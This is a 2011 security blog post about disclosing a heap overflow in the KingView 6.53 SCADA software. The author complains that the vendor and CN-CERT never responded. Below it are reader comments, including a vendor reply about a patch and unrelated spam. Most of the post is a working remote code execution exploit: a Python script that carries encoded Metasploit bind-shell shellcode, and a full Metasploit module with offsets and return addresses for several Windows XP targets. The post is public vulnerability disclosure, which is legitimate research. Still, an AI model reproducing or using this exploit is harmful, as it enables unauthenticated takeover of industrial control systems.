Sunday, January 9, 2011

Waking up the sleeping dragon

On September 28, 2010 I notified Beijing based WellinControl Technology Development Co.,Ltd  and CN-CERT that one of Wellintech's products had a very serious security vulnerability, and that if properly leveraged would allow an attacker to exploit the bug and execute arbitrary code. The vendor and China's National Computer Network Emergency Response Team never responded to my email or the follow up email sent out by US-CERT.  Keep in mind this is not any old software. The vulnerability affects one of the most widely trusted and used supervisory control and data acquisition applications in China.

KingView 6.53 

KingView 6.53



















Download

While I found it extremely disappointing that Wellintech never responded to my disclosure, I was far more bothered with the fact that CN-CERT never responded. What are they doing over there?

However, US-CERT responded within a few weeks of disclosing the vulnerability. US-CERT explained in the email that their team would notify the vendor and respond back with more information as it became available.

They even took the time to express appreciation in a follow up email for disclosing the vulnerability. I must admit, it would have been nice to have received a prompt response from CN-CERT at least letting me know that they received the information and would look into it...

Is this CN-CERT's standard operating procedure?  We know what happens when important security vulnerability disclosures go unaddressed for long periods of time.

Moreover, after waiting several months to see if Wellintech would quietly issue a patch to fix the security vulnerability they didn't. I made a decision to develop a working exploit with code execution to prove that this wasn't just another "software bug".

My initial disclosure to the vendor contained enough pertinent information and the proof of concept code to trigger the bug and overwrite pointers in memory thus allowing arbitrary code code execution.

Vulnerable HistorySvr.exe KingView Process Heap Overflow


What was the problem I asked myself? Why did they fail to respond? Did they want code execution? Why not just fix the vulnerability?

One of my colleagues at NSS Labs has a saying...

"It's hard to argue with a shell" -- Rick Moy

Here it is, a tiny little tcp bind shell courtesy of the Metasploit Framework

Hopefully this will be an incentive to issue a patch to all of Wellintech's customers. :-) 

----snip----

## usage python exploit.py 127.0.0.1 777

import os
import socket
import sys

host = sys.argv[1]
port = int(sys.argv[2])

print " KingView 6.53 SCADA HMI Heap Smashing Exploit "
print " Credits: Dillon Beresford | twitter.com/D1N "

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
buf = ("\xdd\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xbe\xeb\x5d\x85\x19"
"\xb1\x56\x31\x72\x18\x83\xea\xfc\x03\x72\xff\xbf\x70\xe5"
"\x17\xb6\x7b\x16\xe7\xa9\xf2\xf3\xd6\xfb\x61\x77\x4a\xcc"
"\xe2\xd5\x66\xa7\xa7\xcd\xfd\xc5\x6f\xe1\xb6\x60\x56\xcc"
"\x47\x45\x56\x82\x8b\xc7\x2a\xd9\xdf\x27\x12\x12\x12\x29"
"\x53\x4f\xdc\x7b\x0c\x1b\x4e\x6c\x39\x59\x52\x8d\xed\xd5"
"\xea\xf5\x88\x2a\x9e\x4f\x92\x7a\x0e\xdb\xdc\x62\x25\x83"
"\xfc\x93\xea\xd7\xc1\xda\x87\x2c\xb1\xdc\x41\x7d\x3a\xef"
"\xad\xd2\x05\xdf\x20\x2a\x41\xd8\xda\x59\xb9\x1a\x67\x5a"
"\x7a\x60\xb3\xef\x9f\xc2\x30\x57\x44\xf2\x95\x0e\x0f\xf8"
"\x52\x44\x57\x1d\x65\x89\xe3\x19\xee\x2c\x24\xa8\xb4\x0a"
"\xe0\xf0\x6f\x32\xb1\x5c\xde\x4b\xa1\x39\xbf\xe9\xa9\xa8"
"\xd4\x88\xf3\xa4\x19\xa7\x0b\x35\x35\xb0\x78\x07\x9a\x6a"
"\x17\x2b\x53\xb5\xe0\x4c\x4e\x01\x7e\xb3\x70\x72\x56\x70"
"\x24\x22\xc0\x51\x44\xa9\x10\x5d\x91\x7e\x41\xf1\x49\x3f"
"\x31\xb1\x39\xd7\x5b\x3e\x66\xc7\x63\x94\x11\xcf\xad\xcc"
"\x72\xb8\xcf\xf2\x65\x64\x59\x14\xef\x84\x0f\x8e\x87\x66"
"\x74\x07\x30\x98\x5e\x3b\xe9\x0e\xd6\x55\x2d\x30\xe7\x73"
"\x1e\x9d\x4f\x14\xd4\xcd\x4b\x05\xeb\xdb\xfb\x4c\xd4\x8c"
"\x76\x21\x97\x2d\x86\x68\x4f\xcd\x15\xf7\x8f\x98\x05\xa0"
"\xd8\xcd\xf8\xb9\x8c\xe3\xa3\x13\xb2\xf9\x32\x5b\x76\x26"
"\x87\x62\x77\xab\xb3\x40\x67\x75\x3b\xcd\xd3\x29\x6a\x9b"
"\x8d\x8f\xc4\x6d\x67\x46\xba\x27\xef\x1f\xf0\xf7\x69\x20"
"\xdd\x81\x95\x91\x88\xd7\xaa\x1e\x5d\xd0\xd3\x42\xfd\x1f"
"\x0e\xc7\x0d\x6a\x12\x6e\x86\x33\xc7\x32\xcb\xc3\x32\x70"
"\xf2\x47\xb6\x09\x01\x57\xb3\x0c\x4d\xdf\x28\x7d\xde\x8a"
"\x4e\xd2\xdf\x9e"
"\xff\xd1\x90\x90")

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14") # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += buf

print "  [+] Herrow Sweeping Dragon..."
print "  [+] Sending payload..."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect((host,port))
s.send(exploit) 
data = s.recv(1024)

print "  [+] Closing connection.."
s.close() 
print "  [+] Done!"
------------

Metasploit Module for the KingView historysvr.exe works with XP SP3.


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info={})
super(update_info(info,

'Name'        => "KingView 6.53 SCADA HMI HistorySvr Heap Overflow",
'Description' => %q{
This module exploits a buffer overflow in Kingview 6.53.  By sending a specially
crafted request to port 777 (HistorySvr.exe), a remote attacker can
gain arbitrary code execution without authentication and take control of
the machine running KingView 6.53
},
'License'  => MSF_LICENSE,
'Version'  => "$Revision$",
'Author'      =>
[
'Dillon Beresford',
'Rick2600',
],
'References' =>
[
['CVE', '2011-0406'],
['OSVDB', '70366'],
['Bugtraq', '45727'],
['URL', 'http://www.exploit-db.com/exploits/15957'],
['URL', 'http://www.kb.cert.org/vuls/id/180119'],
['URL', 'http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space'    => 12000,
'BadChars' => "\x00\x0d\x0a\xff",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 ENG',
{
'Ret' =>   0x7c997ca9, # ntdll.dll jmp ecx
'Offset' => 31752, # method by D1N
}
],
[ 'Windows XP SP3 ENG 2',
{
'Ret' => 0x7C9A432B, # ntdll.dll jmp ecx
'Offset' => 31752, # method by rick2600
}
],
[ 'Windows XP SP1 ENG',
{
'Ret' => 0x77ED73B4, # UnhandledExceptionFilter() in kernel32.dll
'Offset' => 31788,
}
],
[ 'Debug',
{
'Ret' => 0x41424344, # Debug
'Offset' => 31788,
}
]
],

'DisclosureDate' => "9/28/2010",
'DefaultTarget' => 0))

register_options( [ Opt::RPORT(777) ], self.class )
end

def exploit
sploit = ''

if target.name =~ /XP SP3 ENG/
#d1n
sploit = make_nops(1024)
sploit << payload.encoded
sploit <<  rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << Rex::Arch::X86.jmp_short(4)
sploit << make_nops(6)
sploit << "\xe9\x08\x80"
sploit << "\xff\xff"

elsif target.name =~ /XP SP3 ENG 2/
#rick2600
sploit = "\x90" * 1024
sploit << payload.encoded
sploit << rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << [target.ret].pack('V')
sploit << "\x00"  # PAD
sploit << "\x81\xE9\x08\x80\x00\x00" # SUB ECX,0x8008
sploit << "\xFF\xE1" # JMP ECX

elsif target.name =~ /XP SP1 ENG/
#rick2600 and d1n
sploit << "\x90"*1024
sploit << rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << "\xEB\x10"
sploit << "\x41"*6
sploit << "\xAD\xBB\xC3\x77"
sploit << [target.ret].pack('V')
sploit << "\x90"*8
sploit << payload.encoded
sploit << "\x44"*1000-sploit.length

elsif target.name =~ /Debug/

sploit << "\x90"*1024
sploit << payload.encoded
sploit << rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << [target.ret].pack('V')

end

connect

sock.put(sploit)
sock.get_once

handler
disconnect

end
end

------------


Or you can grab it from Exploit-DB

At the time of this blog post, the vulnerable SCADA software is still available on Wellintech's website for download and presumably running at various critical infrastructure sites in CHINA. I have recently contacted US-CERT again, but this time through my employer just to check if the vendor had responded, the folks from US-CERT told me they still hadn't received any response from Wellintech.

At this point the only thing left for me to do was share the information with the security community and send it over to the good people at Exploit-DB.

A special thanks to the guys over at Metasploit for their handy rapid exploit development modules and some brave souls like David Litchfield, Dave Aitel and Steven Seeley who have sacrificed countless hours of time writing up tutorials on heaps. :-)

I'm not sure whats worse, a 0day for the most popular SCADA software in China floating around in the wild or a team of security professionals from China's CERT sleeping behind the wheel.

-D1N

22 comments:

  1. Probably CN-CERT does not understand English

    ReplyDelete
  2. If they don't understand English they shouldn't be on _any_ CERT.

    ReplyDelete
  3. Quick question - what is Kingview using TCP777 for anyway? Not Multiling HTTP I suspect. A homegrown SCADA P2P?

    ReplyDelete
  4. Oops - answered my own question:
    "The HistorySrv process listens on TCP port 777".

    ReplyDelete
  5. Could CN-CERT be actively accepting vulnerability disclosures and handing them off to the PLA ? I am not accusing them, just wondering if that could be a possibility?

    ReplyDelete
  6. Hey thanks for the plug mate, quite a reliable exploit ;) well done.

    ReplyDelete
  7. http://www.us-cert.gov/control_systems/ics-cert/

    ReplyDelete
  8. We are so thankful for your kindness to let us know the shortage of our software. With your help we have fixed the problem and US-CERT has verified the patch we have release on Dec.15,2010.

    We are really appreciated for what you have done for us.

    Thank you again.

    Luna Kan (On behalf of WellinTech)

    ReplyDelete
  9. CNCERT mainly focus on developing and maintaining their national censorship system AKA GFW...
    next time try www.cnvd.org.cn or www.cnnvd.org.cn
    ChinaNational Vulnerability Database of Information Security

    ReplyDelete
  10. Pretty helpful material, much thanks for this article
    programming Assigment

    ReplyDelete
  11. Based on your comments write my essay paper for me above, here are two articles which you might find helpful:

    ReplyDelete
  12. My partner and I absolutely love your blog and find many of your post’s to be exactly what I’m looking for.
    mesin bakso
    mesin mie
    oven roti
    deep fryer
    mesin kopi
    thanks

    ReplyDelete
  13. Hello everybody! My name is Ketrin and i am 26 years old girl from Europe. But anyway i still work at english writing service Proessays. I really love my work and i know that this is one of the best writing services in internet. If you need some help with essay or other study work then just join our site and Proessays will help you. You will know also how to write an essay.

    ReplyDelete
  14. خدمات نقل وتخزين الاثاث
    تعرف شركة شراء اثاث مستعمل جدة
    ان الاثاث من اكثر الاشياء التي لها ثمن غالي ومكلف للغايةويحتاج الي عناية جيدة وشديدة لقيام بنقلة بطريقة غير مثالية وتعرضة للخدش او الكسر نحن في غني عنه فأن تلفيات الاثاث تؤدي الي التكاليف الباهظة نظرا لتكلفة الاثاث العالية كما انه يؤدي الي الحاجه الي تكلفة اضافية لشراء اثاث من جديد ،
    شركة شراء اثاث مستعمل بجدة
    ، ونظرا لان شركة نقل اثاث بجدة من الشركات التى تعلم جيدا حجم المشكلات والاضرار التى تحدث وهي ايضا من الشركات التى على دراية كاملة بكيفية الوصول الى افضل واحسن النتائج فى عملية النقل ،كل ماعليك ان تتعاون مع شركة شراء الاثاث المستعمل بجدة والاعتماد عليها بشكل كلي في عملية نقل الاثاث من اجل الحصول علي افضل النتائج المثالية في عمليات النقل
    من اهم الخدمات التي تقدمها شركة المستقبل في عملية النقل وتجعلك تضعها من
    ضمن اوائل الشركات هي :
    اعتماد شراء الاثاث المستعمل بجدة علي القيام بأعمال النقل علي عدة مراحل متميزة من اهما اثناء القيام بالنقل داخل المملكة او خارجها وهي مرحلة تصنيف الاثاث عن طريق المعاينة التي تتم من قبل الخبراء والفنين المتخصصين والتعرف علي اعداد القطع الموجودة من قطع خشبية او اجهزة كهربائية ا تحف او اثاث غرف وغيرهم.
    كما اننا نقوم بمرحلة فك الاثاث بعد ذلك وتعتمد شركتنا في هذة المرحلة علي اقوي الاساليب والطرق المستخدمة ويقوم بذلك العملية طاقم كبير من العمالة المتربة للقيام بأعمال الفك والتركيب.
    ارقام شراء الاثاث المستعمل بالرياضثم تأتي بعد ذلك مرحلة التغليف وهي من اهم المراحل التي تعمل علي الحفاظ علي اثاث منزلك وعلي كل قطعة به وتتم عملية التغليف بطريقة مميزة عن باقي الشركات.
    محلات شراء الاثاث المستعمل بالرياضويأتي بعد ذلك للمرحلة الاخيرة وهي نقل الاثاث وتركيبة ويتم اعتمادنا في عملية النقل علي اكبر الشاحنات المميزة التي تساعد علي الحفاظ علي كل قطع اثاثك اثناء عملية السير والنقل كما اننا لا نتطرق الي عمليات النقل التقليدية لخطورتها علي الاثاث وتعرضة للخدش والكسر .
    تخزين الاثاث بالرياض
    ارقام شراء الاثاث المستعمل بجدة
    تمتلك شركة المستقبل افضل واكبر المستودعات المميزة بجدة والتي تساعد علي تحقيق اعلي مستوي من الدقة والتميز فأذا كنت في حيرة من اتمام عملية النقل والتخزين فعليك الاستعانة بشركة نقل اثاث بجدة والاتصال بنا ارقام محلات شراء الاثاث المستعمل بجدة
    والتعاقد معنا للحصول علي كافة خدماتنا وعروضنا المقدمة بأفضل الاسعار المقدمة لعملائنا الكرام .

    ReplyDelete
  15. Basically, the technology essay replicates the structure and the main principles of a standard essay with a few peculiarities of its own.
    We offer you to study the procedure of writing the technology essays on a concrete example. Let's suggest your topic sounds something like "Influence of Modern Technology on Society". The goal of your custom essay is to describe and discuss complicated relations between technology and society. You are to clarify how some particular technology affects people. You are free to illustrate the influence on any sphere of modern life that your technology has affected most.

    First of all, people describe technology as ever-changing. Today new innovations become obsolete fast. People have become increasingly competitive and every year, new ideas and technologies are released to challenge the ones in the market. In a few months, a piece of technology can be released to the market and almost immediately rival companies will as well release theirs. Technological ideas keep getting unleashed as the world becomes more involved in exploring and utilizing the resources nature provides. Nothing seems to survive this fast paced world and unless one maintains the pace and moves with the wave, they get left behind..Read more about technology at Transport Technology

    ReplyDelete